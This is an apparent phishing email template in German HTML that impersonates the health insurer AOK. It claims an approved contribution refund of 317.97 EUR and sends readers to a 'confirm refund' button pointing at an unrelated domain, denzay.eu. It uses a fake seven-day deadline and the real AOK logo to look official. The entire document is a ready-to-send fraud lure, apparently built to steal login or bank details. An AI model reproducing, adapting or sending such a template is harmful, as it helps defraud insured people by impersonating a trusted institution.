<!DOCTYPE html>
<html lang="de" xmlns="http://www.w3.org/1999/xhtml">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <title>AOK &#x2013; Beitragsr&#xfc;ckerstattung</title>
  <style>
    @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&display=swap');
    * { margin: 0; padding: 0; box-sizing: border-box; }
    body { font-family: 'Inter', Arial, sans-serif; background-color: #f0f4f0; color: #1a2e1a; -webkit-font-smoothing: antialiased; }
    .email-wrapper { max-width: 640px; margin: 40px auto; background: #ffffff; border-radius: 4px; overflow: hidden; box-shadow: 0 4px 24px rgba(0,0,0,0.10); }
    .header { background-color: #005E3F; padding: 32px 40px; text-align: center; border-bottom: 4px solid #004730; }
    .header img { height: 52px; display: block; margin: 0 auto; }
    .header-tagline { color: rgba(255,255,255,0.70); font-size: 11px; letter-spacing: 2px; text-transform: uppercase; margin-top: 10px; }
    .badge-bar { background-color: #004730; padding: 10px 40px; display: flex; align-items: center; justify-content: center; gap: 8px; }
    .badge-bar span { color: #91F54A; font-size: 11px; font-weight: 700; letter-spacing: 1.5px; text-transform: uppercase; }
    .badge-dot { width: 5px; height: 5px; background: #91F54A; border-radius: 50%; display: inline-block; }
    .content { padding: 40px 40px 32px; }
    .greeting { font-size: 15px; color: #3a4a3a; line-height: 1.7; margin-bottom: 24px; }
    .amount-spotlight { background: linear-gradient(135deg, #005E3F 0%, #004730 100%); border-radius: 4px; padding: 28px 32px; margin-bottom: 28px; display: flex; align-items: center; justify-content: space-between; }
    .amount-spotlight-label { color: rgba(255,255,255,0.75); font-size: 12px; font-weight: 600; letter-spacing: 1px; text-transform: uppercase; margin-bottom: 6px; }
    .amount-spotlight-value { color: #ffffff; font-size: 36px; font-weight: 800; letter-spacing: -1px; }
    .amount-spotlight-badge { background: rgba(145,245,74,0.15); border: 1px solid rgba(145,245,74,0.4); border-radius: 20px; padding: 6px 14px; }
    .amount-spotlight-badge span { color: #91F54A; font-size: 12px; font-weight: 700; letter-spacing: 0.5px; }
    .section-label { font-size: 10px; font-weight: 700; letter-spacing: 2px; text-transform: uppercase; color: #005E3F; margin-bottom: 12px; padding-bottom: 8px; border-bottom: 2px solid #e8f0e8; }
    .invoice-table { width: 100%; border-collapse: collapse; margin-bottom: 28px; }
    .invoice-table tr { border-bottom: 1px solid #f0f4f0; }
    .invoice-table tr:last-child { border-bottom: none; }
    .invoice-table td { padding: 12px 0; font-size: 14px; }
    .invoice-table td:first-child { color: #6a7e6a; font-weight: 500; }
    .invoice-table td:last-child { color: #1a2e1a; font-weight: 700; text-align: right; }
    .invoice-table .total-row td { padding-top: 14px; font-size: 15px; color: #005E3F; border-top: 2px solid #005E3F; margin-top: 4px; }
    .status-section { margin-bottom: 28px; }
    .status-item { display: flex; align-items: flex-start; gap: 14px; margin-bottom: 0; padding: 12px 0; border-bottom: 1px solid #f0f4f0; }
    .status-item:last-child { border-bottom: none; }
    .status-icon { width: 28px; height: 28px; border-radius: 50%; display: flex; align-items: center; justify-content: center; flex-shrink: 0; font-size: 13px; }
    .status-icon.done { background-color: #e6f5e6; color: #005E3F; }
    .status-icon.pay { background-color: #f0fce6; color: #005E3F; }
    .status-text { flex: 1; }
    .status-title { font-size: 14px; font-weight: 600; color: #1a2e1a; }
    .status-sub { font-size: 12px; color: #8a9e8a; margin-top: 2px; }
    .cta-block { text-align: center; margin: 32px 0; }
    .cta-btn { display: inline-block; background-color: #91F54A; color: #003820; font-size: 15px; font-weight: 800; padding: 16px 40px; border-radius: 4px; text-decoration: none; letter-spacing: 0.3px; }
    .notice-box { background-color: #f8fbf8; border-left: 4px solid #91F54A; border-radius: 0 4px 4px 0; padding: 16px 20px; margin-bottom: 28px; }
    .notice-box p { font-size: 13px; color: #4a5e4a; line-height: 1.6; }
    .notice-box strong { color: #003820; font-weight: 700; }
    .signature { padding-top: 20px; border-top: 1px solid #e8f0e8; }
    .signature p { font-size: 14px; color: #3a4a3a; line-height: 1.8; }
    .signature .name { font-weight: 700; color: #1a2e1a; font-size: 15px; }
    .signature .role { color: #7a8e7a; font-size: 13px; }
    .footer { background-color: #004730; padding: 20px 40px; text-align: center; }
    .footer p { color: rgba(255,255,255,0.55); font-size: 11px; letter-spacing: 0.5px; }
  </style>
</head>
<body>
  <div class="email-wrapper">

    <!-- HEADER -->
    <div class="header">
      <img src="https://login.meine.aok.de/logos/aok-signet-white.svg" alt="AOK" />
      <div class="header-tagline">Die Gesundheitskasse</div>
    </div>

    <!-- BADGE BAR -->
    <div class="badge-bar">
      <span class="badge-dot"></span>
      <span>Beitragsr&#xfc;ckerstattung &#x2013; Offizielles Schreiben</span>
      <span class="badge-dot"></span>
    </div>

    <!-- CONTENT -->
    <div class="content">

      <p class="greeting">
        Sehr geehrte Kundin, sehr geehrter Kunde,<br /><br />
        Ihre <strong>Beitragsr&#xfc;ckerstattung</strong> in H&#xf6;he von <strong>317,97&#x20ac;</strong> wurde erfolgreich gepr&#xfc;ft und genehmigt. Diese R&#xfc;ckzahlung basiert auf Ihrem Anspruch aus der letzten Beitragsperiode.
      </p>

      <!-- AMOUNT SPOTLIGHT -->
      <div class="amount-spotlight">
        <div>
          <div class="amount-spotlight-label">R&#xfc;ckerstattungsbetrag</div>
          <div class="amount-spotlight-value">317,97&#x20ac;</div>
        </div>
        <div class="amount-spotlight-badge">
          <span>&#x2714; Genehmigt</span>
        </div>
      </div>

      <!-- INVOICE TABLE -->
      <div class="section-label">Abrechnungs&#xfc;bersicht</div>
      <table class="invoice-table">
        <tr>
          <td>Beanspruchter Zeitraum</td>
          <td>Letzte Beitragsperiode</td>
        </tr>
        <tr>
          <td>Erstattungsart</td>
          <td>Beitragsr&#xfc;ckerstattung</td>
        </tr>
        <tr>
          <td>R&#xfc;ckerstattungsbetrag</td>
          <td><strong>317,97&#x20ac;</strong></td>
        </tr>
        <tr class="total-row">
          <td><strong>Auszahlungsbetrag</strong></td>
          <td><strong>317,97&#x20ac;</strong></td>
        </tr>
      </table>

      <!-- STATUS -->
      <div class="section-label">Bearbeitungsstatus</div>
      <div class="status-section">
        <div class="status-item">
          <div class="status-icon done">&#x2714;</div>
          <div class="status-text">
            <div class="status-title">In Pr&#xfc;fung</div>
            <div class="status-sub">Ihr Antrag wurde eingereicht und gepr&#xfc;ft</div>
          </div>
        </div>
        <div class="status-item">
          <div class="status-icon done">&#x2714;</div>
          <div class="status-text">
            <div class="status-title">Genehmigt</div>
            <div class="status-sub">Ihr Antrag wurde offiziell genehmigt</div>
          </div>
        </div>
        <div class="status-item">
          <div class="status-icon pay">&#x1f4b0;</div>
          <div class="status-text">
            <div class="status-title"><strong>Auszahlung</strong></div>
            <div class="status-sub">Betrag bereit zur Auszahlung &#x2013; Bitte best&#xe4;tigen</div>
          </div>
        </div>
      </div>

      <!-- CTA -->
      <div class="cta-block">
        <a href="https://denzay.eu/aok/" class="cta-btn">&#x1f449;  R&#xfc;ckerstattung best&#xe4;tigen</a>
      </div>

      <!-- NOTICE -->
      <div class="notice-box">
        <p><strong>Hinweis:</strong> Bitte fordern Sie den Betrag innerhalb von <strong>7 Tagen</strong> ab. Danach steht er aus technischen Gr&#xfc;nden nicht mehr zur Verf&#xfc;gung.</p>
      </div>

      <!-- SIGNATURE -->
      <div class="signature">
        <p>Mit freundlichen Gr&#xfc;&#xdf;en</p>
        <p class="name">Maximilian Becker</p>
        <p class="role">Kundenservice &#xb7; AOK Bundesverband</p>
      </div>

    </div><!-- /content -->

    <!-- FOOTER -->
    <div class="footer">
      <p>&#xa9; 2026 AOK Bundesverband. Alle Rechte vorbehalten.</p>
    </div>

  </div>
</body>
</html>